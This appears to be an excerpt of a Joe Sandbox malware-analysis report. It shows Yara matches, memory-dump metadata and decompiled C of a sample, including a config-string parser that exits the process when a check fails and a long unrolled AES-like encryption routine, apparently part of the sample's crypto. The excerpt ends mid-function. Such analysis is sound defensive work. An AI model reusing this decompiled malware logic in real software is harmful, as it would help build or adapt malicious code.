                                        Yara matches
                                        Similarity
                                        • API ID: AddressAllocateFreeHandleInitializeModuleProc
                                        • String ID: CheckTokenMembership$advapi32.dll
                                        • API String ID: 3309497720-1888249752
                                        • Opcode ID: 4b28e2426369e53848c6573ff566e5cd2918f72aaa619f83f04d7b2dcebc3fc2
                                        • Instruction ID: 1364ad5768d980c357961ec0a15fcb78e6798a02cfaf59951337db2bd74d3669
                                        • Opcode Fuzzy Hash: 4b28e2426369e53848c6573ff566e5cd2918f72aaa619f83f04d7b2dcebc3fc2
                                        • Instruction Fuzzy Hash: C3F03C30A4820ABBDB009BE5EC4BFADB778EB04712F000594FA05E6181E67466148B51
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0FC633E0 Relevance: 7.6, APIs: 5, Instructions: 101memorystringCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 97%
                                        			E0FC633E0(int* __ecx, void* __eflags, CHAR* _a4) {
				int* _v8;
				void* _t8;
				char _t10;
				void* _t14;
				void* _t15;
				char _t18;
				char _t19;
				int _t20;
				CHAR* _t23;
				CHAR* _t26;
				CHAR* _t35;
				CHAR* _t40;

				_push(__ecx);
				_t26 = _a4;
				_t37 = __ecx;
				_v8 = __ecx;
				__ecx[3] = _t26;
				_t8 = E0FC632B0(__ecx);
				if(_t8 == 0 || _t8 == 0xffffffff) {
					ExitProcess(0);
				}
				if(E0FC63320(__ecx) == 0) {
					 *__ecx = 0;
					_t10 =  *_t26;
					if(_t10 == 0) {
						goto L4;
					} else {
						do {
							if(_t10 == 0x7b) {
								_t26 =  &(_t26[1]);
								_t14 = E0FC63190(_t26);
								if(_t14 != 0) {
									_t15 = _t14 - 1;
									if(_t15 == 0) {
										E0FC63200(_t37, _t26, 1);
									} else {
										if(_t15 == 1) {
											_t18 =  *_t26;
											_t35 = _t26;
											if(_t18 == 0) {
												L15:
												_t19 =  *_t35;
												if(_t19 != 0x7d) {
													_t40 = _t35;
													if(_t19 != 0) {
														while( *_t40 != 0x7d) {
															_t40 =  &(_t40[1]);
															if( *_t40 != 0) {
																continue;
															} else {
															}
															goto L21;
														}
														 *_t40 = 0;
													}
													L21:
													_t20 = lstrlenA(_t35);
													_t23 = HeapAlloc(GetProcessHeap(), 8, _t20 + 1);
													 *(_v8 + 8) = _t23;
													if(_t23 != 0) {
														lstrcpyA(_t23, _t35);
													}
													 *_t40 = 0x7d;
													_t37 = _v8;
												}
											} else {
												while(_t18 != 0x7d) {
													_t35 =  &(_t35[1]);
													if(_t18 == 0x3d) {
														goto L15;
													} else {
														_t18 =  *_t35;
														if(_t18 != 0) {
															continue;
														} else {
															goto L15;
														}
													}
													goto L25;
												}
											}
										}
									}
								}
							}
							L25:
							_t7 =  &(_t26[1]); // 0x850f00e8
							_t10 =  *_t7;
							_t26 =  &(_t26[1]);
						} while (_t10 != 0);
						return 1;
					}
				} else {
					 *__ecx = 1;
					L4:
					return 1;
				}
			}















                                        0x0fc633e3
                                        0x0fc633e5
                                        0x0fc633e9
                                        0x0fc633eb
                                        0x0fc633ee
                                        0x0fc633f1
                                        0x0fc633f8
                                        0x0fc634db
                                        0x0fc634db
                                        0x0fc63410
                                        0x0fc63425
                                        0x0fc6342b
                                        0x0fc6342f
                                        0x00000000
                                        0x0fc63431
                                        0x0fc63432
                                        0x0fc63434
                                        0x0fc6343a
                                        0x0fc63441
                                        0x0fc63444
                                        0x0fc6344a
                                        0x0fc6344b
                                        0x0fc634ba
                                        0x0fc6344d
                                        0x0fc6344e
                                        0x0fc63450
                                        0x0fc63452
                                        0x0fc63456
                                        0x0fc63467
                                        0x0fc63467
                                        0x0fc6346b
                                        0x0fc6346d
                                        0x0fc63471
                                        0x0fc63473
                                        0x0fc63478
                                        0x0fc6347c
                                        0x00000000
                                        0x00000000
                                        0x0fc6347e
                                        0x00000000
                                        0x0fc6347c
                                        0x0fc63480
                                        0x0fc63480
                                        0x0fc63483
                                        0x0fc63484
                                        0x0fc63495
                                        0x0fc6349e
                                        0x0fc634a3
                                        0x0fc634a7
                                        0x0fc634a7
                                        0x0fc634ad
                                        0x0fc634b0
                                        0x0fc634b0
                                        0x00000000
                                        0x0fc63458
                                        0x0fc6345c
                                        0x0fc6345f
                                        0x00000000
                                        0x0fc63461
                                        0x0fc63461
                                        0x0fc63465
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0fc63465
                                        0x00000000
                                        0x0fc6345f
                                        0x0fc63458
                                        0x0fc63456
                                        0x0fc6344e
                                        0x0fc6344b
                                        0x0fc63444
                                        0x0fc634bf
                                        0x0fc634bf
                                        0x0fc634bf
                                        0x0fc634c2
                                        0x0fc634c3
                                        0x0fc634d6
                                        0x0fc634d6
                                        0x0fc63412
                                        0x0fc63412
                                        0x0fc63418
                                        0x0fc63422
                                        0x0fc63422

                                        APIs
                                          • Part of subcall function 0FC632B0: lstrlenA.KERNEL32(?,00000000,?,0FC652F0,?,?,0FC633F6,00000000,74CB6980,?,?,0FC652F0,00000000), ref: 0FC632C5
                                          • Part of subcall function 0FC632B0: lstrlenA.KERNEL32(?,?,0FC633F6,00000000,74CB6980,?,?,0FC652F0,00000000), ref: 0FC632EE
                                        • lstrlenA.KERNEL32(0FC652F1,0FC652F1,00000000,00000000,74CB6980,?,?,0FC652F0,00000000), ref: 0FC63484
                                        • GetProcessHeap.KERNEL32(00000008,00000001,?,0FC652F0,00000000), ref: 0FC6348E
                                        • HeapAlloc.KERNEL32(00000000,?,0FC652F0,00000000), ref: 0FC63495
                                        • lstrcpyA.KERNEL32(00000000,0FC652F1,?,0FC652F0,00000000), ref: 0FC634A7
                                        • ExitProcess.KERNEL32 ref: 0FC634DB
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.537524053.000000000FC61000.00000020.00000001.01000000.00000003.sdmp, Offset: 0FC60000, based on PE: true
                                        • Associated: 00000001.00000002.537517635.000000000FC60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537541962.000000000FC6A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537565986.000000000FC72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537573813.000000000FC74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_fc60000_gI5xZdIxUs.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrlen$HeapProcess$AllocExitlstrcpy
                                        • String ID:
                                        • API String ID: 1867342102-0
                                        • Opcode ID: 9778137cec8c5d9bfd5201728b7237cae6a286a4b4ea158bfce6906012af50c0
                                        • Instruction ID: ae4d8efa34f97b78144cfe8454ffcfcab468c520f1e53d33de4e11f97692067a
                                        • Opcode Fuzzy Hash: 9778137cec8c5d9bfd5201728b7237cae6a286a4b4ea158bfce6906012af50c0
                                        • Instruction Fuzzy Hash: 5531397450C2C55ADB230F2988C67F5FF949B02310F984189E9C6DB383D63DAA47C7A0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0FC61C20 Relevance: .7, Instructions: 721COMMONCrypto
                                        Download Yara Rule
                                        C-Code - Quality: 90%
                                        			E0FC61C20(signed int* __ebx, signed int* __edi, signed int* __esi) {
				signed int _t514;
				signed char _t522;
				signed char _t530;
				signed char _t538;
				signed char _t546;
				signed char _t554;
				signed char _t562;
				signed char _t570;
				signed char _t578;
				signed char _t586;
				void* _t595;
				signed char _t603;
				signed char _t618;
				signed int _t628;
				signed char _t630;
				signed char _t631;
				signed char _t633;
				signed char _t635;
				signed char _t636;
				signed char _t638;
				signed char _t640;
				signed char _t641;
				signed char _t643;
				signed char _t645;
				signed char _t646;
				signed char _t648;
				signed char _t650;
				signed char _t651;
				signed char _t653;
				signed char _t655;
				signed char _t656;
				signed char _t658;
				signed char _t660;
				signed char _t661;
				signed char _t663;
				signed char _t665;
				signed char _t666;
				signed char _t668;
				signed char _t670;
				signed char _t671;
				signed char _t673;
				signed char _t675;
				signed char _t676;
				signed char _t681;
				signed char _t682;
				signed char _t684;
				signed char _t686;
				signed char _t687;
				signed char _t690;
				signed char _t691;
				signed char _t693;
				signed char _t695;
				signed char _t696;
				signed int _t699;
				signed char _t700;
				signed char _t708;
				signed char _t709;
				signed char _t717;
				signed char _t718;
				signed char _t726;
				signed char _t727;
				signed char _t735;
				signed char _t736;
				signed char _t744;
				signed char _t745;
				signed char _t753;
				signed char _t754;
				signed char _t762;
				signed char _t763;
				signed char _t771;
				signed char _t772;
				signed char _t780;
				signed char _t781;
				signed char _t789;
				signed char _t797;
				signed char _t798;
				signed char _t806;
				signed char _t814;
				signed char _t815;
				signed int _t824;
				signed char _t825;
				signed char _t826;
				signed char _t827;
				signed char _t828;
				signed char _t829;
				signed char _t830;
				signed char _t831;
				signed char _t832;
				signed char _t833;
				signed char _t834;
				signed char _t835;
				signed char _t836;
				signed char _t837;
				signed char _t838;
				signed char _t839;
				signed char _t840;
				signed char _t841;
				signed char _t842;
				signed char _t843;
				signed char _t844;
				signed char _t845;
				signed char _t846;
				signed char _t847;
				signed char _t848;
				signed char _t849;
				signed int _t851;
				signed int* _t924;
				signed int* _t997;
				signed int* _t998;
				signed int* _t999;
				signed int* _t1011;
				signed int* _t1012;
				signed int* _t1024;
				signed int* _t1025;
				signed int* _t1037;
				signed int* _t1038;
				signed int* _t1050;
				signed int* _t1051;
				signed int* _t1063;
				signed int* _t1064;
				signed int* _t1076;
				signed int* _t1077;
				signed int* _t1089;
				signed int* _t1090;
				signed int* _t1102;
				signed int* _t1103;
				signed int* _t1115;
				signed int* _t1116;
				signed int* _t1128;
				signed int* _t1129;
				signed int* _t1131;
				signed int* _t1143;
				signed int* _t1144;
				signed int* _t1156;
				signed int* _t1168;
				signed int* _t1169;
				signed int** _t1181;

				_t1181[4] = _t997;
				_t1181[3] = __ebx;
				_t1181[2] = __esi;
				_t1181[1] = __edi;
				_t924 = _t1181[6];
				_t998 = _t1181[8];
				_t851 = _t998[0x3c] & 0x000000ff;
				_t514 =  *_t924 ^  *_t998;
				_t628 = _t924[1] ^ _t998[1];
				_t699 = _t924[2] ^ _t998[2];
				_t824 = _t924[3] ^ _t998[3];
				if(_t851 == 0xa0) {
					L6:
					_t999 =  &(_t998[4]);
					 *_t1181 = _t999;
					asm("rol eax, 0x10");
					_t630 = _t628 & 0xffff0000 | _t514 >> 0x00000010;
					_t700 = _t699 >> 0x10;
					_t631 = _t630 >> 0x10;
					_t825 = _t824 >> 0x10;
					_t708 = _t999[2] ^  *(0xfc6c240 + (_t699 & 0x000000ff) * 4) ^  *(0xfc6c640 + (_t628 & 0x000000ff) * 4) ^  *(0xfc6ca40 + (_t514 & 0x000000ff) * 4) ^  *(0xfc6ce40 + (_t825 & 0x000000ff) * 4);
					_t826 = _t999[3] ^  *(0xfc6c240 + (_t824 & 0x000000ff) * 4) ^  *(0xfc6c640 + (_t699 & 0x000000ff) * 4) ^  *(0xfc6ce40 + (_t514 & 0x000000ff) * 4) ^  *(0xfc6ca40 + (_t631 & 0x000000ff) * 4);
					_t1011 =  *_t1181;
					_t522 =  *(0xfc6ca40 + (_t700 & 0x000000ff) * 4) ^  *(0xfc6c240 + (_t630 & 0x000000ff) * 4) ^  *(0xfc6c640 + (_t824 & 0x000000ff) * 4) ^  *(0xfc6ce40 + (_t631 & 0x000000ff) * 4) ^  *_t1011;
					_t633 =  *(0xfc6c240 + (_t628 & 0x000000ff) * 4) ^  *(0xfc6c640 + (_t630 & 0x000000ff) * 4) ^  *(0xfc6ce40 + (_t700 & 0x000000ff) * 4) ^  *(0xfc6ca40 + (_t825 & 0x000000ff) * 4) ^ _t1011[1];
					_t1012 =  &(_t1011[4]);
					 *_t1181 = _t1012;
					asm("rol eax, 0x10");
					_t635 = _t633 & 0xffff0000 | _t522 >> 0x00000010;
					_t709 = _t708 >> 0x10;
					_t636 = _t635 >> 0x10;
					_t827 = _t826 >> 0x10;
					_t717 = _t1012[2] ^  *(0xfc6c240 + (_t708 & 0x000000ff) * 4) ^  *(0xfc6c640 + (_t633 & 0x000000ff) * 4) ^  *(0xfc6ca40 + (_t522 & 0x000000ff) * 4) ^  *(0xfc6ce40 + (_t827 & 0x000000ff) * 4);
					_t828 = _t1012[3] ^  *(0xfc6c240 + (_t826 & 0x000000ff) * 4) ^  *(0xfc6c640 + (_t708 & 0x000000ff) * 4) ^  *(0xfc6ce40 + (_t522 & 0x000000ff) * 4) ^  *(0xfc6ca40 + (_t636 & 0x000000ff) * 4);
					_t1024 =  *_t1181;
					_t530 =  *(0xfc6ca40 + (_t709 & 0x000000ff) * 4) ^  *(0xfc6c240 + (_t635 & 0x000000ff) * 4) ^  *(0xfc6c640 + (_t826 & 0x000000ff) * 4) ^  *(0xfc6ce40 + (_t636 & 0x000000ff) * 4) ^  *_t1024;
					_t638 =  *(0xfc6c240 + (_t633 & 0x000000ff) * 4) ^  *(0xfc6c640 + (_t635 & 0x000000ff) * 4) ^  *(0xfc6ce40 + (_t709 & 0x000000ff) * 4) ^  *(0xfc6ca40 + (_t827 & 0x000000ff) * 4) ^ _t1024[1];
					_t1025 =  &(_t1024[4]);
					 *_t1181 = _t1025;
					asm("rol eax, 0x10");
					_t640 = _t638 & 0xffff0000 | _t530 >> 0x00000010;
					_t718 = _t717 >> 0x10;
					_t641 = _t640 >> 0x10;
					_t829 = _t828 >> 0x10;
					_t726 = _t1025[2] ^  *(0xfc6c240 + (_t717 & 0x000000ff) * 4) ^  *(0xfc6c640 + (_t638 & 0x000000ff) * 4) ^  *(0xfc6ca40 + (_t530 & 0x000000ff) * 4) ^  *(0xfc6ce40 + (_t829 & 0x000000ff) * 4);
					_t830 = _t1025[3] ^  *(0xfc6c240 + (_t828 & 0x000000ff) * 4) ^  *(0xfc6c640 + (_t717 & 0x000000ff) * 4) ^  *(0xfc6ce40 + (_t530 & 0x000000ff) * 4) ^  *(0xfc6ca40 + (_t641 & 0x000000ff) * 4);
					_t1037 =  *_t1181;
					_t538 =  *(0xfc6ca40 + (_t718 & 0x000000ff) * 4) ^  *(0xfc6c240 + (_t640 & 0x000000ff) * 4) ^  *(0xfc6c640 + (_t828 & 0x000000ff) * 4) ^  *(0xfc6ce40 + (_t641 & 0x000000ff) * 4) ^  *_t1037;
					_t643 =  *(0xfc6c240 + (_t638 & 0x000000ff) * 4) ^  *(0xfc6c640 + (_t640 & 0x000000ff) * 4) ^  *(0xfc6ce40 + (_t718 & 0x000000ff) * 4) ^  *(0xfc6ca40 + (_t829 & 0x000000ff) * 4) ^ _t1037[1];
					_t1038 =  &(_t1037[4]);
					 *_t1181 = _t1038;
					asm("rol eax, 0x10");
					_t645 = _t643 & 0xffff0000 | _t538 >> 0x00000010;
					_t727 = _t726 >> 0x10;
					_t646 = _t645 >> 0x10;
					_t831 = _t830 >> 0x10;
					_t735 = _t1038[2] ^  *(0xfc6c240 + (_t726 & 0x000000ff) * 4) ^  *(0xfc6c640 + (_t643 & 0x000000ff) * 4) ^  *(0xfc6ca40 + (_t538 & 0x000000ff) * 4) ^  *(0xfc6ce40 + (_t831 & 0x000000ff) * 4);
					_t832 = _t1038[3] ^  *(0xfc6c240 + (_t830 & 0x000000ff) * 4) ^  *(0xfc6c640 + (_t726 & 0x000000ff) * 4) ^  *(0xfc6ce40 + (_t538 & 0x000000ff) * 4) ^  *(0xfc6ca40 + (_t646 & 0x000000ff) * 4);
					_t1050 =  *_t1181;
					_t546 =  *(0xfc6ca40 + (_t727 & 0x000000ff) * 4) ^  *(0xfc6c240 + (_t645 & 0x000000ff) * 4) ^  *(0xfc6c640 + (_t830 & 0x000000ff) * 4) ^  *(0xfc6ce40 + (_t646 & 0x000000ff) * 4) ^  *_t1050;
					_t648 =  *(0xfc6c240 + (_t643 & 0x000000ff) * 4) ^  *(0xfc6c640 + (_t645 & 0x000000ff) * 4) ^  *(0xfc6ce40 + (_t727 & 0x000000ff) * 4) ^  *(0xfc6ca40 + (_t831 & 0x000000ff) * 4) ^ _t1050[1];
					_t1051 =  &(_t1050[4]);
					 *_t1181 = _t1051;
					asm("rol eax, 0x10");
					_t650 = _t648 & 0xffff0000 | _t546 >> 0x00000010;
					_t736 = _t735 >> 0x10;
					_t651 = _t650 >> 0x10;
					_t833 = _t832 >> 0x10;
					_t744 = _t1051[2] ^  *(0xfc6c240 + (_t735 & 0x000000ff) * 4) ^  *(0xfc6c640 + (_t648 & 0x000000ff) * 4) ^  *(0xfc6ca40 + (_t546 & 0x000000ff) * 4) ^  *(0xfc6ce40 + (_t833 & 0x000000ff) * 4);
					_t834 = _t1051[3] ^  *(0xfc6c240 + (_t832 & 0x000000ff) * 4) ^  *(0xfc6c640 + (_t735 & 0x000000ff) * 4) ^  *(0xfc6ce40 + (_t546 & 0x000000ff) * 4) ^  *(0xfc6ca40 + (_t651 & 0x000000ff) * 4);
					_t1063 =  *_t1181;
					_t554 =  *(0xfc6ca40 + (_t736 & 0x000000ff) * 4) ^  *(0xfc6c240 + (_t650 & 0x000000ff) * 4) ^  *(0xfc6c640 + (_t832 & 0x000000ff) * 4) ^  *(0xfc6ce40 + (_t651 & 0x000000ff) * 4) ^  *_t1063;
					_t653 =  *(0xfc6c240 + (_t648 & 0x000000ff) * 4) ^  *(0xfc6c640 + (_t650 & 0x000000ff) * 4) ^  *(0xfc6ce40 + (_t736 & 0x000000ff) * 4) ^  *(0xfc6ca40 + (_t833 & 0x000000ff) * 4) ^ _t1063[1];
					_t1064 =  &(_t1063[4]);
					 *_t1181 = _t1064;
					asm("rol eax, 0x10");
					_t655 = _t653 & 0xffff0000 | _t554 >> 0x00000010;
					_t745 = _t744 >> 0x10;
					_t656 = _t655 >> 0x10;
					_t835 = _t834 >> 0x10;
					_t753 = _t1064[2] ^  *(0xfc6c240 + (_t744 & 0x000000ff) * 4) ^  *(0xfc6c640 + (_t653 & 0x000000ff) * 4) ^  *(0xfc6ca40 + (_t554 & 0x000000ff) * 4) ^  *(0xfc6ce40 + (_t835 & 0x000000ff) * 4);
					_t836 = _t1064[3] ^  *(0xfc6c240 + (_t834 & 0x000000ff) * 4) ^  *(0xfc6c640 + (_t744 & 0x000000ff) * 4) ^  *(0xfc6ce40 + (_t554 & 0x000000ff) * 4) ^  *(0xfc6ca40 + (_t656 & 0x000000ff) * 4);
					_t1076 =  *_t1181;
					_t562 =  *(0xfc6ca40 + (_t745 & 0x000000ff) * 4) ^  *(0xfc6c240 + (_t655 & 0x000000ff) * 4) ^  *(0xfc6c640 + (_t834 & 0x000000ff) * 4) ^  *(0xfc6ce40 + (_t656 & 0x000000ff) * 4) ^  *_t1076;
					_t658 =  *(0xfc6c240 + (_t653 & 0x000000ff) * 4) ^  *(0xfc6c640 + (_t655 & 0x000000ff) * 4) ^  *(0xfc6ce40 + (_t745 & 0x000000ff) * 4) ^  *(0xfc6ca40 + (_t835 & 0x000000ff) * 4) ^ _t1076[1];
					_t1077 =  &(_t1076[4]);
					 *_t1181 = _t1077;
					asm("rol eax, 0x10");
					_t660 = _t658 & 0xffff0000 | _t562 >> 0x00000010;
					_t754 = _t753 >> 0x10;
					_t661 = _t660 >> 0x10;
					_t837 = _t836 >> 0x10;
					_t762 = _t1077[2] ^  *(0xfc6c240 + (_t753 & 0x000000ff) * 4) ^  *(0xfc6c640 + (_t658 & 0x000000ff) * 4) ^  *(0xfc6ca40 + (_t562 & 0x000000ff) * 4) ^  *(0xfc6ce40 + (_t837 & 0x000000ff) * 4);
					_t838 = _t1077[3] ^  *(0xfc6c240 + (_t836 & 0x000000ff) * 4) ^  *(0xfc6c640 + (_t753 & 0x000000ff) * 4) ^  *(0xfc6ce40 + (_t562 & 0x000000ff) * 4) ^  *(0xfc6ca40 + (_t661 & 0x000000ff) * 4);
					_t1089 =  *_t1181;
					_t570 =  *(0xfc6ca40 + (_t754 & 0x000000ff) * 4) ^  *(0xfc6c240 + (_t660 & 0x000000ff) * 4) ^  *(0xfc6c640 + (_t836 & 0x000000ff) * 4) ^  *(0xfc6ce40 + (_t661 & 0x000000ff) * 4) ^  *_t1089;
					_t663 =  *(0xfc6c240 + (_t658 & 0x000000ff) * 4) ^  *(0xfc6c640 + (_t660 & 0x000000ff) * 4) ^  *(0xfc6ce40 + (_t754 & 0x000000ff) * 4) ^  *(0xfc6ca40 + (_t837 & 0x000000ff) * 4) ^ _t1089[1];
					_t1090 =  &(_t1089[4]);
					 *_t1181 = _t1090;
					asm("rol eax, 0x10");
					_t665 = _t663 & 0xffff0000 | _t570 >> 0x00000010;
					_t763 = _t762 >> 0x10;
					_t666 = _t665 >> 0x10;
					_t839 = _t838 >> 0x10;
					_t771 = _t1090[2] ^  *(0xfc6c240 + (_t762 & 0x000000ff) * 4) ^  *(0xfc6c640 + (_t663 & 0x000000ff) * 4) ^  *(0xfc6ca40 + (_t570 & 0x000000ff) * 4) ^  *(0xfc6ce40 + (_t839 & 0x000000ff) * 4);
					_t840 = _t1090[3] ^  *(0xfc6c240 + (_t838 & 0x000000ff) * 4) ^  *(0xfc6c640 + (_t762 & 0x000000ff) * 4) ^  *(0xfc6ce40 + (_t570 & 0x000000ff) * 4) ^  *(0xfc6ca40 + (_t666 & 0x000000ff) * 4);
					_t1102 =  *_t1181;
					_t578 =  *(0xfc6ca40 + (_t763 & 0x000000ff) * 4) ^  *(0xfc6c240 + (_t665 & 0x000000ff) * 4) ^  *(0xfc6c640 + (_t838 & 0x000000ff) * 4) ^  *(0xfc6ce40 + (_t666 & 0x000000ff) * 4) ^  *_t1102;
					_t668 =  *(0xfc6c240 + (_t663 & 0x000000ff) * 4) ^  *(0xfc6c640 + (_t665 & 0x000000ff) * 4) ^  *(0xfc6ce40 + (_t763 & 0x000000ff) * 4) ^  *(0xfc6ca40 + (_t839 & 0x000000ff) * 4) ^ _t1102[1];
					_t1103 =  &(_t1102[4]);
					 *_t1181 = _t1103;
					asm("rol eax, 0x10");
					_t670 = _t668 & 0xffff0000 | _t578 >> 0x00000010;
					_t772 = _t771 >> 0x10;
					_t671 = _t670 >> 0x10;
					_t841 = _t840 >> 0x10;
					_t780 = _t1103[2] ^  *(0xfc6c240 + (_t771 & 0x000000ff) * 4) ^  *(0xfc6c640 + (_t668 & 0x000000ff) * 4) ^  *(0xfc6ca40 + (_t578 & 0x000000ff) * 4) ^  *(0xfc6ce40 + (_t841 & 0x000000ff) * 4);
					_t842 = _t1103[3] ^  *(0xfc6c240 + (_t840 & 0x000000ff) * 4) ^  *(0xfc6c640 + (_t771 & 0x000000ff) * 4) ^  *(0xfc6ce40 + (_t578 & 0x000000ff) * 4) ^  *(0xfc6ca40 + (_t671 & 0x000000ff) * 4);
					_t1115 =  *_t1181;
					_t586 =  *(0xfc6ca40 + (_t772 & 0x000000ff) * 4) ^  *(0xfc6c240 + (_t670 & 0x000000ff) * 4) ^  *(0xfc6c640 + (_t840 & 0x000000ff) * 4) ^  *(0xfc6ce40 + (_t671 & 0x000000ff) * 4) ^  *_t1115;
					_t673 =  *(0xfc6c240 + (_t668 & 0x000000ff) * 4) ^  *(0xfc6c640 + (_t670 & 0x000000ff) * 4) ^  *(0xfc6ce40 + (_t772 & 0x000000ff) * 4) ^  *(0xfc6ca40 + (_t841 & 0x000000ff) * 4) ^ _t1115[1];
					_t1116 =  &(_t1115[4]);
					 *_t1181 = _t1116;
					asm("rol eax, 0x10");
					_t675 = _t673 & 0xffff0000 | _t586 >> 0x00000010;
					_t781 = _t780 >> 0x10;
					_t676 = _t675 >> 0x10;
					_t843 = _t842 >> 0x10;
					_t1128 =  *_t1181;
					_t1129 = _t1181[7];
					 *_t1129 =  *(0xfc6da40 + (_t781 & 0x000000ff) * 4) ^  *(0xfc6d240 + (_t675 & 0x000000ff) * 4) ^  *(0xfc6d640 + (_t842 & 0x000000ff) * 4) ^  *(0xfc6de40 + (_t676 & 0x000000ff) * 4) ^  *_t1128;
					_t1129[1] =  *(0xfc6d240 + (_t673 & 0x000000ff) * 4) ^  *(0xfc6d640 + (_t675 & 0x000000ff) * 4) ^  *(0xfc6de40 + (_t781 & 0x000000ff) * 4) ^  *(0xfc6da40 + (_t843 & 0x000000ff) * 4) ^ _t1128[1];
					_t1129[2] = _t1116[2] ^  *(0xfc6d240 + (_t780 & 0x000000ff) * 4) ^  *(0xfc6d640 + (_t673 & 0x000000ff) * 4) ^  *(0xfc6da40 + (_t586 & 0x000000ff) * 4) ^  *(0xfc6de40 + (_t843 & 0x000000ff) * 4);
					_t1129[3] = _t1116[3] ^  *(0xfc6d240 + (_t842 & 0x000000ff) * 4) ^  *(0xfc6d640 + (_t780 & 0x000000ff) * 4) ^  *(0xfc6de40 + (_t586 & 0x000000ff) * 4) ^  *(0xfc6da40 + (_t676 & 0x000000ff) * 4);
					_t595 = 0;
				} else {
					if(_t851 == 0xc0) {
						L5:
						_t1131 =  &(_t998[4]);
						 *_t1181 = _t1131;
						asm("rol eax, 0x10");
						_t681 = _t628 & 0xffff0000 | _t514 >> 0x00000010;
						_t789 = _t699 >> 0x10;
						_t682 = _t681 >> 0x10;
						_t844 = _t824 >> 0x10;
						_t797 = _t1131[2] ^  *(0xfc6c240 + (_t699 & 0x000000ff) * 4) ^  *(0xfc6c640 + (_t628 & 0x000000ff) * 4) ^  *(0xfc6ca40 + (_t514 & 0x000000ff) * 4) ^  *(0xfc6ce40 + (_t844 & 0x000000ff) * 4);
						_t845 = _t1131[3] ^  *(0xfc6c240 + (_t824 & 0x000000ff) * 4) ^  *(0xfc6c640 + (_t699 & 0x000000ff) * 4) ^  *(0xfc6ce40 + (_t514 & 0x000000ff) * 4) ^  *(0xfc6ca40 + (_t682 & 0x000000ff) * 4);
						_t1143 =  *_t1181;
						_t603 =  *(0xfc6ca40 + (_t789 & 0x000000ff) * 4) ^  *(0xfc6c240 + (_t681 & 0x000000ff) * 4) ^  *(0xfc6c640 + (_t824 & 0x000000ff) * 4) ^  *(0xfc6ce40 + (_t682 & 0x000000ff) * 4) ^  *_t1143;
						_t684 =  *(0xfc6c240 + (_t628 & 0x000000ff) * 4) ^  *(0xfc6c640 + (_t681 & 0x000000ff) * 4) ^  *(0xfc6ce40 + (_t789 & 0x000000ff) * 4) ^  *(0xfc6ca40 + (_t844 & 0x000000ff) * 4) ^ _t1143[1];
						_t1144 =  &(_t1143[4]);
						 *_t1181 = _t1144;
						asm("rol eax, 0x10");
						_t686 = _t684 & 0xffff0000 | _t603 >> 0x00000010;
						_t798 = _t797 >> 0x10;
						_t687 = _t686 >> 0x10;
						_t846 = _t845 >> 0x10;
						_t699 = _t1144[2] ^  *(0xfc6c240 + (_t797 & 0x000000ff) * 4) ^  *(0xfc6c640 + (_t684 & 0x000000ff) * 4) ^  *(0xfc6ca40 + (_t603 & 0x000000ff) * 4) ^  *(0xfc6ce40 + (_t846 & 0x000000ff) * 4);
						_t824 = _t1144[3] ^  *(0xfc6c240 + (_t845 & 0x000000ff) * 4) ^  *(0xfc6c640 + (_t797 & 0x000000ff) * 4) ^  *(0xfc6ce40 + (_t603 & 0x000000ff) * 4) ^  *(0xfc6ca40 + (_t687 & 0x000000ff) * 4);
						_t998 =  *_t1181;
						_t514 =  *(0xfc6ca40 + (_t798 & 0x000000ff) * 4) ^  *(0xfc6c240 + (_t686 & 0x000000ff) * 4) ^  *(0xfc6c640 + (_t845 & 0x000000ff) * 4) ^  *(0xfc6ce40 + (_t687 & 0x000000ff) * 4) ^  *_t998;
						_t628 =  *(0xfc6c240 + (_t684 & 0x000000ff) * 4) ^  *(0xfc6c640 + (_t686 & 0x000000ff) * 4) ^  *(0xfc6ce40 + (_t798 & 0x000000ff) * 4) ^  *(0xfc6ca40 + (_t846 & 0x000000ff) * 4) ^ _t998[1];
						goto L6;
					} else {
						if(_t851 == 0xe0) {
							_t1156 =  &(_t998[4]);
							 *_t1181 = _t1156;
							asm("rol eax, 0x10");
							_t690 = _t628 & 0xffff0000 | _t514 >> 0x00000010;
							_t806 = _t699 >> 0x10;
							_t691 = _t690 >> 0x10;
							_t847 = _t824 >> 0x10;
							_t814 = _t1156[2] ^  *(0xfc6c240 + (_t699 & 0x000000ff) * 4) ^  *(0xfc6c640 + (_t628 & 0x000000ff) * 4) ^  *(0xfc6ca40 + (_t514 & 0x000000ff) * 4) ^  *(0xfc6ce40 + (_t847 & 0x000000ff) * 4);
							_t848 = _t1156[3] ^  *(0xfc6c240 + (_t824 & 0x000000ff) * 4) ^  *(0xfc6c640 + (_t699 & 0x000000ff) * 4) ^  *(0xfc6ce40 + (_t514 & 0x000000ff) * 4) ^  *(0xfc6ca40 + (_t691 & 0x000000ff) * 4);
							_t1168 =  *_t1181;
							_t618 =  *(0xfc6ca40 + (_t806 & 0x000000ff) * 4) ^  *(0xfc6c240 + (_t690 & 0x000000ff) * 4) ^  *(0xfc6c640 + (_t824 & 0x000000ff) * 4) ^  *(0xfc6ce40 + (_t691 & 0x000000ff) * 4) ^  *_t1168;
							_t693 =  *(0xfc6c240 + (_t628 & 0x000000ff) * 4) ^  *(0xfc6c640 + (_t690 & 0x000000ff) * 4) ^  *(0xfc6ce40 + (_t806 & 0x000000ff) * 4) ^  *(0xfc6ca40 + (_t847 & 0x000000ff) * 4) ^ _t1168[1];
							_t1169 =  &(_t1168[4]);
							 *_t1181 = _t1169;
							asm("rol eax, 0x10");
							_t695 = _t693 & 0xffff0000 | _t618 >> 0x00000010;
							_t815 = _t814 >> 0x10;
							_t696 = _t695 >> 0x10;
							_t849 = _t848 >> 0x10;
